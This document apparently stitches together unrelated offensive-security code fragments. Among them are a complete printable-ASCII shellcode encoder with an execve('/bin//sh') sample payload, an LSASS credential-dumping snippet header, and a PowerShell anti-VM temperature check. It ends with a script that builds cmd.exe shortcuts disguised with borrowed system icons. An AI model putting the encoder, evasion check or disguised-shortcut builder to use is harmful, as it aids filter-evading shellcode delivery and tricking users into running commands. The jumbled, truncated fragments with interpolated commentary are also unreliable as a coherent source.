#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging the rebuild-on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs' `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically, one feeds the program a binary-encoded shellcode on its input,
# and it yields the ASCII-encoded form on its output.
#
# This payload will at the beginning align the stack by firstly moving

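The encoding the header comment refers to, as an added example that is not the gist's own code (the preview above cuts the gist off): a minimal Dissembler-style encoder plus a small interpreter that checks the result. It assumes a 32-bit x86 target, an allowed immediate byte range of 0x21 to 0x7e, the two AND masks "JONE" and "501:" to clear EAX, NOP padding to a dword boundary, and leaves out the ESP realignment prologue the comment mentions; the sample shellcode is a constructed execve("/bin//sh") stub, and `run()` is a verification aid, not part of the technique.

```python
#!/usr/bin/env python3
"""Printable-ASCII shellcode encoder (added example, not the gist's code).

Rebuild-on-the-stack loader: zero EAX with two complementary printable AND
masks, then for every dword of the payload (last one first) emit three
printable SUB immediates and a PUSH, so the original bytes reassemble on the
stack. Assumes a 32-bit x86 target; the ESP realignment prologue is left to
the caller.
"""
import struct

PRINT_MIN, PRINT_MAX = 0x21, 0x7E          # allowed immediate bytes ('!' .. '~')

# Two printable masks with no bits in common: AND EAX with both clears it.
ZERO_MASKS = (0x454E4F4A, 0x3A313035)      # "JONE", "501:" (assumed choice)
assert ZERO_MASKS[0] & ZERO_MASKS[1] == 0

OP_AND_EAX, OP_SUB_EAX, OP_PUSH_EAX = 0x25, 0x2D, 0x50   # x86 opcodes used


def split_dword(value):
    """Return three dwords of printable bytes whose sum is `value` mod 2**32.

    Solved byte by byte from the least significant end, carrying into the
    next byte: each position holds three bytes that sum to the needed value.
    """
    parts = [0, 0, 0]
    carry = 0
    for i in range(4):
        need = ((value >> (8 * i)) & 0xFF) - carry
        # Three printable bytes sum to 0x63..0x17A; wrap by 256 if `need` is too small.
        total = need if need >= 3 * PRINT_MIN else need + 256
        carry = 1 if total != need else 0
        rest = total - 3 * PRINT_MIN
        for j in range(3):
            take = min(rest, PRINT_MAX - PRINT_MIN)
            parts[j] |= (PRINT_MIN + take) << (8 * i)
            rest -= take
        assert rest == 0
    return tuple(parts)


def is_printable(code):
    """True if every byte of `code` is in the allowed range."""
    return all(PRINT_MIN <= b <= PRINT_MAX for b in code)


def encode(shellcode):
    """Return printable machine code that rebuilds `shellcode` on the stack."""
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)   # NOP-pad to a dword boundary
    out = bytearray()
    for mask in ZERO_MASKS:
        out += bytes([OP_AND_EAX]) + struct.pack("<I", mask)
    eax = 0
    for off in range(len(padded) - 4, -1, -4):             # push the last dword first
        (dword,) = struct.unpack("<I", padded[off:off + 4])
        # EAX still holds the previous dword; subtract our way to the next one.
        for imm in split_dword((eax - dword) % 2**32):
            out += bytes([OP_SUB_EAX]) + struct.pack("<I", imm)
        out.append(OP_PUSH_EAX)
        eax = dword
    assert is_printable(out)
    return bytes(out)


def run(code):
    """Interpret the three opcodes emitted by encode(); return the bytes left on the stack."""
    eax, pc, stack = 0, 0, bytearray()
    while pc < len(code):
        op = code[pc]
        if op in (OP_AND_EAX, OP_SUB_EAX):
            (imm,) = struct.unpack("<I", code[pc + 1:pc + 5])
            eax = eax & imm if op == OP_AND_EAX else (eax - imm) % 2**32
            pc += 5
        elif op == OP_PUSH_EAX:
            stack[0:0] = struct.pack("<I", eax)            # push grows toward lower addresses
            pc += 1
        else:
            raise ValueError("unexpected opcode %#x at %d" % (op, pc))
    return bytes(stack)


# Constructed sample: a classic 24-byte Linux x86 execve("/bin//sh") shellcode.
SAMPLE_SHELLCODE = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

if __name__ == "__main__":
    loader = encode(SAMPLE_SHELLCODE)
    print(loader.decode("ascii"))
    assert run(loader) == SAMPLE_SHELLCODE
```

Running the block prints the printable loader for the sample; in a real payload it has to sit where ESP can be pointed just past its own end, so that the pushed bytes land where execution continues once the last PUSH retires.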
CloseHandle(HANDLE handle) __import("kernel32");
CreateDirectoryA(const char* name, void* security) __import("kernel32");
CreateFileA(const char* name, uint32_t access, uint32_t share, void* security, uint32_t disposition,
CreateFileMappingA(HANDLE file, void* security, uint32_t prot,
CreatePipe(HANDLE* read, HANDLE* write, void* security, uint32_t size) __import("kernel32");
CreateProcessA(const char* app, const char* cmdline, void* processAttr, void* threadAttr,
DeleteFileA(const char* name) __import("kernel32");
ExitProcess(uint32_t exitCode) __import("kernel32") __noreturn;
FindClose(HANDLE find) __import("kernel32");
FindFirstFileA(const char* name, WIN32_FIND_DATAA* data) __import("kernel32");

/*
 * fork.c
 * Experimental fork() on Windows. Requires NT 6 subsystem or
 * newer.
 *
 * Copyright (c) 2012 William Pitcock <[email protected]>
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.

#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
// process reflection code copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
// minidump / process lookup code copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
// compile with: cl.exe refl.cpp /DUNICODE

#!/usr/bin/python3
from socket import inet_aton
from struct import unpack
from flask import Flask
import requests
import re
app = Flask(__name__)

function Get-AntiVMwithTemperature {
    # MSAcpi_ThermalZoneTemperature is usually absent or "Not supported" on virtual machines, so a failed query is the anti-VM signal itself
    try { $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" -ErrorAction Stop }
    catch { return "No ACPI thermal zone exposed (likely a virtual machine): $($_.Exception.Message)" }
    # CurrentTemperature is in tenths of a Kelvin; several zones may be reported, so use the first
    $valorTempKelvin = @($t)[0].CurrentTemperature / 10
    $valorTempCelsius = $valorTempKelvin - 273.15
    $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32
    return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K"
}

//#____ ____ __
//#\ \ / /____ _____/ |_ ___________
//# \ Y // __ \_/ ___\ __\/ _ \_ __ \
//# \ /\ ___/\ \___| | ( <_> ) | \/
//# \___/ \___ >\___ >__| \____/|__|
//# \/ \/
//#--Licensed under GNU GPL 3
//#----Authored by Vector/NullArray
//###############################################

`C:\Program Files\IDA Pro 7.4\python\3\idc.py:5121: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if newtype is not '':`
--- FIX ---
To resolve the above warning, change line 5121 to
`if newtype != '':`
(`is not ''` was an identity comparison against the empty-string literal, which newer Python flags; `!=` keeps the same "non-empty type string" check. Changing it to `is not None` would instead let an empty string through.)

# You can iterate over the index argument for shell32.dll to get all sorts of different icons.
# It seems you can also specify your own icon, but I have not managed to get that to work.
# Usage: pass the icon index as the first argument; it is also used as the .lnk file name.
write-host "shortcut $($args[0]), and file name $($args[0])"
# 1.txt holds the command line that the shortcut passes to cmd.exe
$file = Get-Content "C:\Users\wonderkun\Desktop\1.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Users\wonderkun\Desktop\test\$($args[0]).lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
# Borrow a system icon so the shortcut looks like something other than a cmd.exe launcher
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,$($args[0])"
$Shortcut.Arguments = ' ' + $file
$Shortcut.Save()
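The iteration the comment mentions, as an added example that is not the gist's code: create one shortcut per shell32.dll icon index over a range, then read every .lnk back through the same WScript.Shell COM object so the real target and arguments can be compared with what the icon suggests. Assumed: an output directory under %TEMP%, a harmless constructed command line in place of 1.txt, and indices 0 to 10 by default.

```powershell
# Added example (not the gist's own code): enumerate shell32.dll icon indices by
# creating one shortcut per index, then read each .lnk back with the same COM API.
# Assumptions: $OutDir is writable; $CommandLine is a constructed, harmless value.
param(
    [string]$OutDir = (Join-Path $env:TEMP "lnk-icons"),
    [int]$First = 0,
    [int]$Last = 10,
    [string]$CommandLine = "/c echo shortcut test"
)

$WshShell = New-Object -ComObject WScript.Shell
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

for ($i = $First; $i -le $Last; $i++) {
    $path = Join-Path $OutDir ("icon-{0}.lnk" -f $i)
    $Shortcut = $WshShell.CreateShortcut($path)
    $Shortcut.TargetPath   = "%SystemRoot%\system32\cmd.exe"
    $Shortcut.Arguments    = $CommandLine
    $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,$i"   # icon index $i
    $Shortcut.Save()
}

# Read the shortcuts back: TargetPath and Arguments are what actually run,
# regardless of which icon the shortcut displays.
Get-ChildItem -Path $OutDir -Filter *.lnk | ForEach-Object {
    $s = $WshShell.CreateShortcut($_.FullName)
    [PSCustomObject]@{
        Name         = $_.Name
        TargetPath   = $s.TargetPath
        Arguments    = $s.Arguments
        IconLocation = $s.IconLocation
    }
} | Format-Table -AutoSize
```

The read-back half is the check worth keeping: a shortcut whose icon points into Shell32.dll while its target is cmd.exe with a long argument string is exactly the pattern the gist builds, and the same CreateShortcut call exposes it from the defender's side without executing anything.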